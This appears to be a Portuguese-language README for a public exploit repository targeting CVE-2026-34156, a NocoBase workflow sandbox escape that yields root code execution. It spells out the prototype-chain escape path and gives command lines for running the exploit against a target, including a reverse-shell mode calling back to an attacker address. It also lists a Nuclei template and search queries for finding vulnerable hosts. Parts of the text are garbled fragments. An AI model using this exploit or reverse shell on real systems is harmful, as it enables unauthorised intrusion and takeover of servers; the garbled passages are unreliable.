
CVE-2026-34156
Execução Remota de Código como Root sem Autenticação / com Privilégios Baixos no NocoBase
CVE-2026-34156 é uma vulnerabilidade crítica de escape de sandbox no NocoBase (uma plataforma open-source no-code/low-code).
Um atacante com a capacidade de criar ou executar um Workflow Script Node (mesmo com privilégios baixos) pode escapar da sandbox vm do Node.js e alcançar Execução Remota de Código completa como root dentro do contêiner.
@nocobase/plugin-workflow-javascript (Script Node)console._stdout.constructor.constructoruid=0)fs)O objeto console passado para a sandbox é do realm do host, permitindo que atacantes escalem a cadeia de protótipos e acessem o construtor real Function → process.mainModule.require.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
O repositório inclui: Script PoC completo, template Nuclei e verificador seguro.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) em produção.
Este repositório é somente para fins educacionais e de pesquisa de segurança autorizada.
Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.
Exploração não autorizada é ilegal.
Feito com ❤️ para a comunidade de segurança
Fique seguro. Atualize rápido.